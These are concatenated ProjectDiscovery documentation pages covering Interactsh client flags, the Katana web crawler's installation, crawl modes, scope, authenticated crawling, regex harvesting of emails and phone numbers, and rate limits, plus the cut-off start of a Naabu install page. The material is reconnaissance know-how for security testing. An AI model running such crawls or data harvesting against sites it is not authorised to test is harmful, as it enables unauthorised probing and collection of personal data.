# Interactsh Usage
Source: https://docs.projectdiscovery.io/tools/interactsh/usage
Learn Interact usage including flags and filters
## Access help
Use `interactsh-client -h` to display all of the help options.
## Interactsh options
```yaml
Usage:
./interactsh-client [flags]
Flags:
INPUT:
-s, -server string interactsh server(s) to use (default "oast.pro,oast.live,oast.site,oast.online,oast.fun,oast.me")
CONFIG:
-config string flag configuration file (default "$HOME/.config/interactsh-client/config.yaml")
-n, -number int number of interactsh payload to generate (default 1)
-t, -token string authentication token to connect protected interactsh server
-pi, -poll-interval int poll interval in seconds to pull interaction data (default 5)
-nf, -no-http-fallback disable http fallback registration
-cidl, -correlation-id-length int length of the correlation id preamble (default 20)
-cidn, -correlation-id-nonce-length int length of the correlation id nonce (default 13)
-sf, -session-file string store/read from session file
FILTER:
-m, -match string[] match interaction based on the specified pattern
-f, -filter string[] filter interaction based on the specified pattern
-dns-only display only dns interaction in CLI output
-http-only display only http interaction in CLI output
-smtp-only display only smtp interactions in CLI output
UPDATE:
-up, -update update interactsh-client to latest version
-duc, -disable-update-check disable automatic interactsh-client update check
OUTPUT:
-o string output file to write interaction data
-json write output in JSONL(ines) format
-ps, -payload-store enable storing generated interactsh payload to file
-psf, -payload-store-file string store generated interactsh payloads to given file (default "interactsh_payload.txt")
-v display verbose interaction
DEBUG:
-version show version of the project
-health-check, -hc run diagnostic check up
```
# Installing Katana
Source: https://docs.projectdiscovery.io/tools/katana/install
Learn about how to install Katana
Enter the command below in a terminal to install ProjectDiscovery's Katana using Go.
```bash
go install github.com/projectdiscovery/katana/cmd/katana@latest
```
Enter the command below in a terminal to install ProjectDiscovery's Katana using Go.
To install/update Docker to the latest tag
```bash
docker pull projectdiscovery/katana:latest
```
Enter the command below in a terminal to install ProjectDiscovery's Katana using GitHub.
```bash
go install github.com/projectdiscovery/katana/cmd/katana@latest
```
For running Ubuntu we recommend installing the following prerequisits
```sh
sudo apt update
sudo snap refresh
sudo apt install zip curl wget git
sudo snap install golang --classic
wget -q -O - https://dl-ssl.google.com/linux/linux_signing_key.pub | sudo apt-key add -
sudo sh -c 'echo "deb http://dl.google.com/linux/chrome/deb/ stable main" >> /etc/apt/sources.list.d/google.list'
sudo apt update
sudo apt install google-chrome-stable
```
```bash
https://github.com/projectdiscovery/katana/releases
```
* Download the latest binary for your OS.
* Unzip the file to run binary.
## Installation Notes
* Katana requires the latest version of [**Go**](https://go.dev/doc/install)
* Add the Go bin path to the system paths. On OSX or Linux, in your terminal use
```
echo export $PATH=$PATH:$HOME/go/bin >> $home/.bashrc
source $home/.bashrc
```
* To add the Go bin path in Windows, [click this link for instructions.](https://www.architectryan.com/2018/03/17/add-to-the-path-on-windows-10/)
* The binary will be located in `$home/go/bin/katana`
# Katana Overview
Source: https://docs.projectdiscovery.io/tools/katana/overview
A web crawling framework designed to navigate and parse for hidden details
## What is **Katana?**
Katana is a command-line interface (CLI) web crawling tool written in Golang, designed to be fast, efficient, and provide simple output.
It is designed to crawl websites to gather information and endpoints. One of its defining features is the ability to use headless browsing to crawl applications.
This means that it can crawl single-page applications (SPAs) built using technologies such as JavaScript, Angular, or React to effectively access and gather information from these types of applications.
* Check [out this great ProjectDiscovery blog post](https://blog.projectdiscovery.io/introducing-katana-the-best-cli-web-crawler/) from the initial launch for more information on Katana.
* We also [wrote a great “deep dive” blog](https://blog.projectdiscovery.io/a-deep-dive-on-katana-field-extraction/) on Katana’s field extraction
## Features and capabilities
* Fast and fully configurable web crawling
* Support for Standard and Headless modes
* JavaScript parsing and crawling support
* Customizable automatic form-filling
* Customizable output through preconfigured fields
* Customizable scope control through preconfigured fields and Regex
* Support Inputs through STDIN, URL, and LIST
* Supported Outputs of STDOUT, FILE, and JSON
## Additional Katana resources
As an open source tool with a robust community there are a lot of community-created resources available.
We are happy to share those to offer even more information about our tools.
Sharing these resources **is not formal approval or a recommendation** from ProjectDiscovery.
We cannot provide an endorsement of accuracy or validation that content is up-to-date. Anything shared here should be approached with caution.
* [https://medium.com/@sherlock297/katana-framework-how-to-use-it-to-scan-and-mass-collect-website-data-107f5ae326e0](https://medium.com/@sherlock297/katana-framework-how-to-use-it-to-scan-and-mass-collect-website-data-107f5ae326e0)
* [https://medium.com/@cuncis/katana-an-overview-of-the-powerful-web-application-security-scanner-cheat-sheet-6fc50236aff6](https://medium.com/@cuncis/katana-an-overview-of-the-powerful-web-application-security-scanner-cheat-sheet-6fc50236aff6)
* [https://www.geeksforgeeks.org/katana-crawling-and-spidering-framework/](https://www.geeksforgeeks.org/katana-crawling-and-spidering-framework/)
## Support
Questions about using Katana? Issues working through installation? Cool story or use case you want to share? Get in touch!
Check out the [Help](/help) section of the docs or reach out to us on [Discord](https://discord.com/invite/projectdiscovery).
# Running Katana
Source: https://docs.projectdiscovery.io/tools/katana/running
Learn about running Katana with examples including commands and output
For all of the flags and options available for Katana be sure to check out the [Usage](/tools/katana/usage) page.
On this page we share examples of Katana with specific flags and goals and the output you can expect from each.
If you have questions, reach out to us through [Help](/help).
## Running Katana
Katana requires a URL or endpoint to crawl and accepts single or multiple inputs.
A URL can be provided using -u option, and multiple values can be provided using comma-separated input, similarly file input is supported using -list option and additionally piped input (stdin) is also supported.
### Input for katana
A URL can be provided using -u option, and multiple values can be provided using comma-separated input, similarly file input is supported using -list option and additionally piped input (stdin) is also supported.
#### URL Input
```sh
katana -u https://tesla.com
```
#### Multiple URL Input (comma-separated)
```sh
katana -u https://tesla.com,https://google.com
```
#### List Input
```bash
$ cat url_list.txt
https://tesla.com
https://google.com
```
```
katana -list url_list.txt
```
#### STDIN (piped) Input
```sh
echo https://tesla.com | katana
```
```sh
cat domains | httpx | katana
```
Example running katana -
```console
katana -u https://youtube.com
__ __
/ /_____ _/ /____ ____ ___ _
/ '_/ _ / __/ _ / _ \/ _ /
/_/\_\\_,_/\__/\_,_/_//_/\_,_/ v0.0.1
projectdiscovery.io
[WRN] Use with caution. You are responsible for your actions.
[WRN] Developers assume no liability and are not responsible for any misuse or damage.
https://www.youtube.com/
https://www.youtube.com/about/
https://www.youtube.com/about/press/
https://www.youtube.com/about/copyright/
https://www.youtube.com/t/contact_us/
https://www.youtube.com/creators/
https://www.youtube.com/ads/
https://www.youtube.com/t/terms
https://www.youtube.com/t/privacy
https://www.youtube.com/about/policies/
https://www.youtube.com/howyoutubeworks?utm_campaign=ytgen&utm_source=ythp&utm_medium=LeftNav&utm_content=txt&u=https%3A%2F%2Fwww.youtube.com%2Fhowyoutubeworks%3Futm_source%3Dythp%26utm_medium%3DLeftNav%26utm_campaign%3Dytgen
https://www.youtube.com/new
https://m.youtube.com/
https://www.youtube.com/s/desktop/4965577f/jsbin/desktop_polymer.vflset/desktop_polymer.js
https://www.youtube.com/s/desktop/4965577f/cssbin/www-main-desktop-home-page-skeleton.css
https://www.youtube.com/s/desktop/4965577f/cssbin/www-onepick.css
https://www.youtube.com/s/_/ytmainappweb/_/ss/k=ytmainappweb.kevlar_base.0Zo5FUcPkCg.L.B1.O/am=gAE/d=0/rs=AGKMywG5nh5Qp-BGPbOaI1evhF5BVGRZGA
https://www.youtube.com/opensearch?locale=en_GB
https://www.youtube.com/manifest.webmanifest
https://www.youtube.com/s/desktop/4965577f/cssbin/www-main-desktop-watch-page-skeleton.css
https://www.youtube.com/s/desktop/4965577f/jsbin/web-animations-next-lite.min.vflset/web-animations-next-lite.min.js
https://www.youtube.com/s/desktop/4965577f/jsbin/custom-elements-es5-adapter.vflset/custom-elements-es5-adapter.js
https://www.youtube.com/s/desktop/4965577f/jsbin/webcomponents-sd.vflset/webcomponents-sd.js
https://www.youtube.com/s/desktop/4965577f/jsbin/intersection-observer.min.vflset/intersection-observer.min.js
https://www.youtube.com/s/desktop/4965577f/jsbin/scheduler.vflset/scheduler.js
https://www.youtube.com/s/desktop/4965577f/jsbin/www-i18n-constants-en_GB.vflset/www-i18n-constants.js
https://www.youtube.com/s/desktop/4965577f/jsbin/www-tampering.vflset/www-tampering.js
https://www.youtube.com/s/desktop/4965577f/jsbin/spf.vflset/spf.js
https://www.youtube.com/s/desktop/4965577f/jsbin/network.vflset/network.js
https://www.youtube.com/howyoutubeworks/
https://www.youtube.com/trends/
https://www.youtube.com/jobs/
https://www.youtube.com/kids/
```
## Crawling Mode
### Standard Mode
Standard crawling modality uses the standard go http library under the hood to handle HTTP requests/responses. This modality is much faster as it doesn't have the browser overhead. Still, it analyzes HTTP responses body as is, without any javascript or DOM rendering, potentially missing post-dom-rendered endpoints or asynchronous endpoint calls that might happen in complex web applications depending, for example, on browser-specific events.
### Headless Mode
Headless mode hooks internal headless calls to handle HTTP requests/responses directly within the browser context. This offers two advantages:
* The HTTP fingerprint (TLS and user agent) fully identify the client as a legitimate browser
* Better coverage since the endpoints are discovered analyzing the standard raw response, as in the previous modality, and also the browser-rendered one with javascript enabled.
Headless crawling is optional and can be enabled using `-headless` option.
Here are other headless CLI options -
```console
katana -h headless
Flags:
HEADLESS:
-hl, -headless enable headless hybrid crawling (experimental)
-sc, -system-chrome use local installed chrome browser instead of katana installed
-sb, -show-browser show the browser on the screen with headless mode
-ho, -headless-options string[] start headless chrome with additional options
-nos, -no-sandbox start headless chrome in --no-sandbox mode
-cdd, -chrome-data-dir string path to store chrome browser data
-scp, -system-chrome-path string use specified chrome browser for headless crawling
-noi, -no-incognito start headless chrome without incognito mode
-cwu, -chrome-ws-url string use chrome browser instance launched elsewhere with the debugger listening at this URL
-xhr, -xhr-extraction extract xhr requests
```
### `-no-sandbox`
***
Runs headless chrome browser with **no-sandbox** option, useful when running as root user.
```console
katana -u https://tesla.com -headless -no-sandbox
```
### *`-no-incognito`*
***
Runs headless chrome browser without incognito mode, useful when using the local browser.
```console
katana -u https://tesla.com -headless -no-incognito
```
### *`-headless-options`*
***
When crawling in headless mode, additional chrome options can be specified using `-headless-options`, for example -
```console
katana -u https://tesla.com -headless -system-chrome -headless-options --disable-gpu,proxy-server=http://127.0.0.1:8080
```
## Scope Control
Crawling can be endless if not scoped, as such katana comes with multiple support to define the crawl scope.
### *`-field-scope`*
***
Most handy option to define scope with predefined field name, `rdn` being default option for field scope.
* `rdn` - crawling scoped to root domain name and all subdomains (e.g. `*example.com`) (default)
* `fqdn` - crawling scoped to given sub(domain) (e.g. `www.example.com` or `api.example.com`)
* `dn` - crawling scoped to domain name keyword (e.g. `example`)
```console
katana -u https://tesla.com -fs dn
```
### *`-crawl-scope`*
***
For advanced scope control, `-cs` option can be used that comes with **regex** support.
```console
katana -u https://tesla.com -cs login
```
For multiple in scope rules, file input with multiline string / regex can be passed.
```bash
$ cat in_scope.txt
login/
admin/
app/
wordpress/
```
```console
katana -u https://tesla.com -cs in_scope.txt
```
### *`-crawl-out-scope`*
***
For defining what not to crawl, `-cos` option can be used and also support **regex** input.
```console
katana -u https://tesla.com -cos logout
```
For multiple out of scope rules, file input with multiline string / regex can be passed.
```bash
$ cat out_of_scope.txt
/logout
/log_out
```
```console
katana -u https://tesla.com -cos out_of_scope.txt
```
### *`-no-scope`*
***
Katana is default to scope `*.domain`, to disable this `-ns` option can be used and also to crawl the internet.
```console
katana -u https://tesla.com -ns
```
## *`-display-out-scope`*
As default, when scope option is used, it also applies for the links to display as output, as such **external URLs are default to exclude** and to overwrite this behavior, `-do` option can be used to display all the external URLs that exist in targets scoped URL / Endpoint.
```
katana -u https://tesla.com -do
```
Here is all the CLI options for the scope control -
```console
katana -h scope
Flags:
SCOPE:
-cs, -crawl-scope string[] in scope url regex to be followed by crawler
-cos, -crawl-out-scope string[] out of scope url regex to be excluded by crawler
-fs, -field-scope string pre-defined scope field (dn,rdn,fqdn) (default "rdn")
-ns, -no-scope disables host based default scope
-do, -display-out-scope display external endpoint from scoped crawling
```
## Crawler Configuration
Katana comes with multiple options to configure and control the crawl as the way we want.
### *`-depth`*
***
Option to define the `depth` to follow the urls for crawling, the more depth the more number of endpoint being crawled + time for crawl.
```
katana -u https://tesla.com -d 5
```
### *`-js-crawl`*
***
Option to enable JavaScript file parsing + crawling the endpoints discovered in JavaScript files, disabled as default.
```
katana -u https://tesla.com -jc
```
### *`-crawl-duration`*
***
Option to predefined crawl duration, disabled as default.
```
katana -u https://tesla.com -ct 2
```
### *`-known-files`*
***
Option to enable crawling `robots.txt` and `sitemap.xml` file, disabled as default.
```
katana -u https://tesla.com -kf robotstxt,sitemapxml
```
### *`-automatic-form-fill`*
***
Option to enable automatic form filling for known / unknown fields, known field values can be customized as needed by updating form config file at `$HOME/.config/katana/form-config.yaml`.
Automatic form filling is experimental feature.
```
katana -u https://tesla.com -aff
```
## Authenticated Crawling
Authenticated crawling involves including custom headers or cookies in HTTP requests to access protected resources. These headers provide authentication or authorization information, allowing you to crawl authenticated content / endpoint. You can specify headers directly in the command line or provide them as a file with katana to perfrom authenticated crawling.
> **Note**: User needs to be manually perform the authentication and export the session cookie / header to file to use with katana.
### *`-headers`*
***
Option to add a custom header or cookie to the request.
> Syntax of [headers](https://datatracker.ietf.org/doc/html/rfc7230#section-3.2) in the HTTP specification
Here is an example of adding a cookie to the request:
```
katana -u https://tesla.com -H 'Cookie: usrsess=AmljNrESo'
```
It is also possible to supply headers or cookies as a file. For example:
```
$ cat cookie.txt
Cookie: PHPSESSIONID=XXXXXXXXX
X-API-KEY: XXXXX
TOKEN=XX
```
```
katana -u https://tesla.com -H cookie.txt
```
There are more options to configure when needed, here is all the config related CLI options -
```console
katana -h config
Flags:
CONFIGURATION:
-r, -resolvers string[] list of custom resolver (file or comma separated)
-d, -depth int maximum depth to crawl (default 3)
-jc, -js-crawl enable endpoint parsing / crawling in javascript file
-ct, -crawl-duration int maximum duration to crawl the target for
-kf, -known-files string enable crawling of known files (all,robotstxt,sitemapxml)
-mrs, -max-response-size int maximum response size to read (default 9223372036854775807)
-timeout int time to wait for request in seconds (default 10)
-aff, -automatic-form-fill enable automatic form filling (experimental)
-fx, -form-extraction enable extraction of form, input, textarea & select elements
-retry int number of times to retry the request (default 1)
-proxy string http/socks5 proxy to use
-H, -headers string[] custom header/cookie to include in request
-config string path to the katana configuration file
-fc, -form-config string path to custom form configuration file
-flc, -field-config string path to custom field configuration file
-s, -strategy string Visit strategy (depth-first, breadth-first) (default "depth-first")
```
## Connecting to Active Browser Session
Katana can also connect to active browser session where user is already logged in and authenticated. and use it for crawling. The only requirement for this is to start browser with remote debugging enabled.
Here is an example of starting chrome browser with remote debugging enabled and using it with katana -
**step 1) First Locate path of chrome executable**
| Operating System | Chromium Executable Location | Google Chrome Executable Location |
| ---------------- | --------------------------------------------------------------- | -------------------------------------------------------------- |
| Windows (64-bit) | `C:\Program Files (x86)\Google\Chromium\Application\chrome.exe` | `C:\Program Files (x86)\Google\Chrome\Application\chrome.exe` |
| Windows (32-bit) | `C:\Program Files\Google\Chromium\Application\chrome.exe` | `C:\Program Files\Google\Chrome\Application\chrome.exe` |
| macOS | `/Applications/Chromium.app/Contents/MacOS/Chromium` | `/Applications/Google Chrome.app/Contents/MacOS/Google Chrome` |
| Linux | `/usr/bin/chromium` | `/usr/bin/google-chrome` |
**step 2) Start chrome with remote debugging enabled and it will return websocker url. For example, on MacOS, you can start chrome with remote debugging enabled using following command** -
```console
$ /Applications/Google\ Chrome.app/Contents/MacOS/Google\ Chrome --remote-debugging-port=9222
DevTools listening on ws://127.0.0.1:9222/devtools/browser/c5316c9c-19d6-42dc-847a-41d1aeebf7d6
```
> Now login to the website you want to crawl and keep the browser open.
**step 3) Now use the websocket url with katana to connect to the active browser session and crawl the website**
```console
katana -headless -u https://tesla.com -cwu ws://127.0.0.1:9222/devtools/browser/c5316c9c-19d6-42dc-847a-41d1aeebf7d6 -no-incognito
```
> **Note**: you can use `-cdd` option to specify custom chrome data directory to store browser data and cookies but that does not save session data if cookie is set to `Session` only or expires after certain time.
## Filters
### *`-field`*
***
Katana comes with built in fields that can be used to filter the output for the desired information, `-f` option can be used to specify any of the available fields.
```
-f, -field string field to display in output (url,path,fqdn,rdn,rurl,qurl,qpath,file,key,value,kv,dir,udir)
```
Here is a table with examples of each field and expected output when used -
| FIELD | DESCRIPTION | EXAMPLE |
| ------- | --------------------------- | ----------------------------------------------------------------------------- |
| `url` | URL Endpoint | `https://admin.projectdiscovery.io/admin/login?user=admin&password=admin` |
| `qurl` | URL including query param | `https://admin.projectdiscovery.io/admin/login.php?user=admin&password=admin` |
| `qpath` | Path including query param | `/login?user=admin&password=admin` |
| `path` | URL Path | `https://admin.projectdiscovery.io/admin/login` |
| `fqdn` | Fully Qualified Domain name | `admin.projectdiscovery.io` |
| `rdn` | Root Domain name | `projectdiscovery.io` |
| `rurl` | Root URL | `https://admin.projectdiscovery.io` |
| `ufile` | URL with File | `https://admin.projectdiscovery.io/login.js` |
| `file` | Filename in URL | `login.php` |
| `key` | Parameter keys in URL | `user,password` |
| `value` | Parameter values in URL | `admin,admin` |
| `kv` | Keys=Values in URL | `user=admin&password=admin` |
| `dir` | URL Directory name | `/admin/` |
| `udir` | URL with Directory | `https://admin.projectdiscovery.io/admin/` |
Here is an example of using field option to only display all the urls with query parameter in it -
```
katana -u https://tesla.com -f qurl -silent
https://shop.tesla.com/en_au?redirect=no
https://shop.tesla.com/en_nz?redirect=no
https://shop.tesla.com/product/men_s-raven-lightweight-zip-up-bomber-jacket?sku=1740250-00-A
https://shop.tesla.com/product/tesla-shop-gift-card?sku=1767247-00-A
https://shop.tesla.com/product/men_s-chill-crew-neck-sweatshirt?sku=1740176-00-A
https://www.tesla.com/about?redirect=no
https://www.tesla.com/about/legal?redirect=no
https://www.tesla.com/findus/list?redirect=no
```
### Custom Fields
You can create custom fields to extract and store specific information from page responses using regex rules. These custom fields are defined using a YAML config file and are loaded from the default location at `$HOME/.config/katana/field-config.yaml`. Alternatively, you can use the `-flc` option to load a custom field config file from a different location.
Here is example custom field.
```yaml
- name: email
type: regex
regex:
- '([a-zA-Z0-9._-]+@[a-zA-Z0-9._-]+\.[a-zA-Z0-9_-]+)'
- '([a-zA-Z0-9+._-]+@[a-zA-Z0-9._-]+\.[a-zA-Z0-9_-]+)'
- name: phone
type: regex
regex:
- '\d{3}-\d{8}|\d{4}-\d{7}'
```
When defining custom fields, following attributes are supported:
* **name** (required)
> The value of **name** attribute is used as the `-field` cli option value.
* **type** (required)
> The type of custom attribute, currenly supported option - `regex`
* **part** (optional)
> The part of the response to extract the information from. The default value is `response`, which includes both the header and body. Other possible values are `header` and `body`.
* group (optional)
> You can use this attribute to select a specific matched group in regex, for example: `group: 1`
#### Running katana using custom field:
```console
katana -u https://tesla.com -f email,phone
```
## *`-store-field`*
To compliment `field` option which is useful to filter output at run time, there is `-sf, -store-fields` option which works exactly like field option except instead of filtering, it stores all the information on the disk under `katana_field` directory sorted by target url.
```
katana -u https://tesla.com -sf key,fqdn,qurl -silent
```
```bash
$ ls katana_field/
https_www.tesla.com_fqdn.txt
https_www.tesla.com_key.txt
https_www.tesla.com_qurl.txt
```
The `-store-field` option can be useful for collecting information to build a targeted wordlist for various purposes, including but not limited to:
* Identifying the most commonly used parameters
* Discovering frequently used paths
* Finding commonly used files
* Identifying related or unknown subdomains
## Katana Filters
### *`-extension-match`*
***
Crawl output can be easily matched for specific extension using `-em` option to ensure to display only output containing given extension.
```
katana -u https://tesla.com -silent -em js,jsp,json
```
### *`-extension-filter`*
***
Crawl output can be easily filtered for specific extension using `-ef` option which ensure to remove all the urls containing given extension.
```
katana -u https://tesla.com -silent -ef css,txt,md
```
### *`-match-regex`*
***
The `-match-regex` or `-mr` flag allows you to filter output URLs using regular expressions. When using this flag, only URLs that match the specified regular expression will be printed in the output.
```
katana -u https://tesla.com -mr 'https://shop\.tesla\.com/*' -silent
```
## *`-filter-regex`*
The `-filter-regex` or `-fr` flag allows you to filter output URLs using regular expressions. When using this flag, it will skip the URLs that are match the specified regular expression.
```
katana -u https://tesla.com -fr 'https://www\.tesla\.com/*' -silent
```
### Advance Filtering
Katana supports DSL-based expressions for advanced matching and filtering capabilities:
* To match endpoints with a 200 status code:
```shell
katana -u https://www.hackerone.com -mdc 'status_code == 200'
```
* To match endpoints that contain "default" and have a status code other than 403:
```shell
katana -u https://www.hackerone.com -mdc 'contains(endpoint, "default") && status_code != 403'
```
* To match endpoints with PHP technologies:
```shell
katana -u https://www.hackerone.com -mdc 'contains(to_lower(technologies), "php")'
```
* To filter out endpoints running on Cloudflare:
```shell
katana -u https://www.hackerone.com -fdc 'contains(to_lower(technologies), "cloudflare")'
```
DSL functions can be applied to any keys in the jsonl output. For more information on available DSL functions, please visit the [dsl project](https://github.com/projectdiscovery/dsl).
Here are additional filter options -
```console
katana -h filter
Flags:
FILTER:
-mr, -match-regex string[] regex or list of regex to match on output url (cli, file)
-fr, -filter-regex string[] regex or list of regex to filter on output url (cli, file)
-f, -field string field to display in output (url,path,fqdn,rdn,rurl,qurl,qpath,file,ufile,key,value,kv,dir,udir)
-sf, -store-field string field to store in per-host output (url,path,fqdn,rdn,rurl,qurl,qpath,file,ufile,key,value,kv,dir,udir)
-em, -extension-match string[] match output for given extension (eg, -em php,html,js)
-ef, -extension-filter string[] filter output for given extension (eg, -ef png,css)
-mdc, -match-condition string match response with dsl based condition
-fdc, -filter-condition string filter response with dsl based condition
```
## Rate Limit
It's easy to get blocked / banned while crawling if not following target websites limits, katana comes with multiple option to tune the crawl to go as fast / slow we want.
### *`-delay`*
***
option to introduce a delay in seconds between each new request katana makes while crawling, disabled as default.
```
katana -u https://tesla.com -delay 20
```
### *`-concurrency`*
***
option to control the number of urls per target to fetch at the same time.
```
katana -u https://tesla.com -c 20
```
### *`-parallelism`*
***
option to define number of target to process at same time from list input.
```
katana -u https://tesla.com -p 20
```
### *`-rate-limit`*
***
option to use to define max number of request can go out per second.
```
katana -u https://tesla.com -rl 100
```
### *`-rate-limit-minute`*
***
option to use to define max number of request can go out per minute.
```
katana -u https://tesla.com -rlm 500
```
Here is all long / short CLI options for rate limit control -
```console
katana -h rate-limit
Flags:
RATE-LIMIT:
-c, -concurrency int number of concurrent fetchers to use (default 10)
-p, -parallelism int number of concurrent inputs to process (default 10)
-rd, -delay int request delay between each request in seconds
-rl, -rate-limit int maximum requests to send per second (default 150)
-rlm, -rate-limit-minute int maximum number of requests to send per minute
```
## Output
Katana support both file output in plain text format as well as JSON which includes additional information like, `source`, `tag`, and `attribute` name to co-related the discovered endpoint.
### *`-output`*
By default, katana outputs the crawled endpoints in plain text format. The results can be written to a file by using the -output option.
```console
katana -u https://example.com -no-scope -output example_endpoints.txt
```
### *`-jsonl`*
***
```console
katana -u https://example.com -jsonl | jq .
```
```json
{
"timestamp": "2023-03-20T16:23:58.027559+05:30",
"request": {
"method": "GET",
"endpoint": "https://example.com",
"raw": "GET / HTTP/1.1\r\nHost: example.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36\r\nAccept-Encoding: gzip\r\n\r\n"
},
"response": {
"status_code": 200,
"headers": {
"accept_ranges": "bytes",
"expires": "Mon, 27 Mar 2023 10:53:58 GMT",
"last_modified": "Thu, 17 Oct 2019 07:18:26 GMT",
"content_type": "text/html; charset=UTF-8",
"server": "ECS (dcb/7EA3)",
"vary": "Accept-Encoding",
"etag": "\"3147526947\"",
"cache_control": "max-age=604800",
"x_cache": "HIT",
"date": "Mon, 20 Mar 2023 10:53:58 GMT",
"age": "331239"
},
"body": "\n\n\n Example Domain\n\n \n \n \n \n\n\n\n
\n
Example Domain
\n
This domain is for use in illustrative examples in documents. You may use this\n domain in literature without prior coordination or asking for permission.
This domain is for use in illustrative examples in documents. You may use this\n domain in literature without prior coordination or asking for permission.
\n\n\n"
}
}
```
### *`-store-response`*
***
The `-store-response` option allows for writing all crawled endpoint requests and responses to a text file. When this option is used, text files including the request and response will be written to the **katana\_response** directory. If you would like to specify a custom directory, you can use the `-store-response-dir` option.
```console
katana -u https://example.com -no-scope -store-response
```
```bash
$ cat katana_response/index.txt
katana_response/example.com/327c3fda87ce286848a574982ddd0b7c7487f816.txt https://example.com (200 OK)
katana_response/www.iana.org/bfc096e6dd93b993ca8918bf4c08fdc707a70723.txt http://www.iana.org/domains/reserved (200 OK)
```
**Note:**
*`-store-response` option is not supported in `-headless` mode.*
Here are additional CLI options related to output -
```console
katana -h output
OUTPUT:
-o, -output string file to write output to
-sr, -store-response store http requests/responses
-srd, -store-response-dir string store http requests/responses to custom directory
-j, -json write output in JSONL(ines) format
-nc, -no-color disable output content coloring (ANSI escape codes)
-silent display output only
-v, -verbose display verbose output
-version display project version
```
## Katana as a library
`katana` can be used as a library by creating an instance of the `Option` struct and populating it with the same options that would be specified via CLI. Using the options you can create `crawlerOptions` and so standard or hybrid `crawler`.
`crawler.Crawl` method should be called to crawl the input.
```go
package main
import (
"math"
"github.com/projectdiscovery/gologger"
"github.com/projectdiscovery/katana/pkg/engine/standard"
"github.com/projectdiscovery/katana/pkg/output"
"github.com/projectdiscovery/katana/pkg/types"
)
func main() {
options := &types.Options{
MaxDepth: 3, // Maximum depth to crawl
FieldScope: "rdn", // Crawling Scope Field
BodyReadSize: math.MaxInt, // Maximum response size to read
Timeout: 10, // Timeout is the time to wait for request in seconds
Concurrency: 10, // Concurrency is the number of concurrent crawling goroutines
Parallelism: 10, // Parallelism is the number of urls processing goroutines
Delay: 0, // Delay is the delay between each crawl requests in seconds
RateLimit: 150, // Maximum requests to send per second
Strategy: "depth-first", // Visit strategy (depth-first, breadth-first)
OnResult: func(result output.Result) { // Callback function to execute for result
gologger.Info().Msg(result.Request.URL)
},
}
crawlerOptions, err := types.NewCrawlerOptions(options)
if err != nil {
gologger.Fatal().Msg(err.Error())
}
defer crawlerOptions.Close()
crawler, err := standard.New(crawlerOptions)
if err != nil {
gologger.Fatal().Msg(err.Error())
}
defer crawler.Close()
var input = "https://www.hackerone.com"
err = crawler.Crawl(input)
if err != nil {
gologger.Warning().Msgf("Could not crawl %s: %s", input, err.Error())
}
}
```
# Katana Usage
Source: https://docs.projectdiscovery.io/tools/katana/usage
Review Katana usage including flags, configs, and options
## Access help
Use `katana - h` to display all help options.
## Katana help options
```
Flags:
INPUT:
-u, -list string[] target url / list to crawl
CONFIGURATION:
-r, -resolvers string[] list of custom resolver (file or comma separated)
-d, -depth int maximum depth to crawl (default 3)
-jc, -js-crawl enable endpoint parsing / crawling in javascript file
-jsl, -jsluice enable jsluice parsing in javascript file (memory intensive)
-ct, -crawl-duration value maximum duration to crawl the target for (s, m, h, d) (default s)
-kf, -known-files string enable crawling of known files (all,robotstxt,sitemapxml)
-mrs, -max-response-size int maximum response size to read (default 9223372036854775807)
-timeout int time to wait for request in seconds (default 10)
-aff, -automatic-form-fill enable automatic form filling (experimental)
-fx, -form-extraction extract form, input, textarea & select elements in jsonl output
-retry int number of times to retry the request (default 1)
-proxy string http/socks5 proxy to use
-H, -headers string[] custom header/cookie to include in all http request in header:value format (file)
-config string path to the katana configuration file
-fc, -form-config string path to custom form configuration file
-flc, -field-config string path to custom field configuration file
-s, -strategy string Visit strategy (depth-first, breadth-first) (default "depth-first")
-iqp, -ignore-query-params Ignore crawling same path with different query-param values
-tlsi, -tls-impersonate enable experimental client hello (ja3) tls randomization
DEBUG:
-health-check, -hc run diagnostic check up
-elog, -error-log string file to write sent requests error log
HEADLESS:
-hl, -headless enable headless hybrid crawling (experimental)
-sc, -system-chrome use local installed chrome browser instead of katana installed
-sb, -show-browser show the browser on the screen with headless mode
-ho, -headless-options string[] start headless chrome with additional options
-nos, -no-sandbox start headless chrome in --no-sandbox mode
-cdd, -chrome-data-dir string path to store chrome browser data
-scp, -system-chrome-path string use specified chrome browser for headless crawling
-noi, -no-incognito start headless chrome without incognito mode
-cwu, -chrome-ws-url string use chrome browser instance launched elsewhere with the debugger listening at this URL
-xhr, -xhr-extraction extract xhr request url,method in jsonl output
SCOPE:
-cs, -crawl-scope string[] in scope url regex to be followed by crawler
-cos, -crawl-out-scope string[] out of scope url regex to be excluded by crawler
-fs, -field-scope string pre-defined scope field (dn,rdn,fqdn) or custom regex (e.g., '(company-staging.io|company.com)') (default "rdn")
-ns, -no-scope disables host based default scope
-do, -display-out-scope display external endpoint from scoped crawling
FILTER:
-mr, -match-regex string[] regex or list of regex to match on output url (cli, file)
-fr, -filter-regex string[] regex or list of regex to filter on output url (cli, file)
-f, -field string field to display in output (url,path,fqdn,rdn,rurl,qurl,qpath,file,ufile,key,value,kv,dir,udir)
-sf, -store-field string field to store in per-host output (url,path,fqdn,rdn,rurl,qurl,qpath,file,ufile,key,value,kv,dir,udir)
-em, -extension-match string[] match output for given extension (eg, -em php,html,js)
-ef, -extension-filter string[] filter output for given extension (eg, -ef png,css)
-mdc, -match-condition string match response with dsl based condition
-fdc, -filter-condition string filter response with dsl based condition
RATE-LIMIT:
-c, -concurrency int number of concurrent fetchers to use (default 10)
-p, -parallelism int number of concurrent inputs to process (default 10)
-rd, -delay int request delay between each request in seconds
-rl, -rate-limit int maximum requests to send per second (default 150)
-rlm, -rate-limit-minute int maximum number of requests to send per minute
UPDATE:
-up, -update update katana to latest version
-duc, -disable-update-check disable automatic katana update check
OUTPUT:
-o, -output string file to write output to
-sr, -store-response store http requests/responses
-srd, -store-response-dir string store http requests/responses to custom directory
-or, -omit-raw omit raw requests/responses from jsonl output
-ob, -omit-body omit response body from jsonl output
-j, -jsonl write output in jsonl format
-nc, -no-color disable output content coloring (ANSI escape codes)
-silent display output only
-v, -verbose display verbose output
-debug display debug output
-version display project version
```
# Installing Naabu
Source: https://docs.projectdiscovery.io/tools/naabu/install
Learn about how to install Naabu and get started
Enter the command below in a terminal to install ProjectDiscovery's Naabu using Go.
```bash
go install -v github.com/projectdiscovery/naabu/cmd/naabu@latest
```
```bash
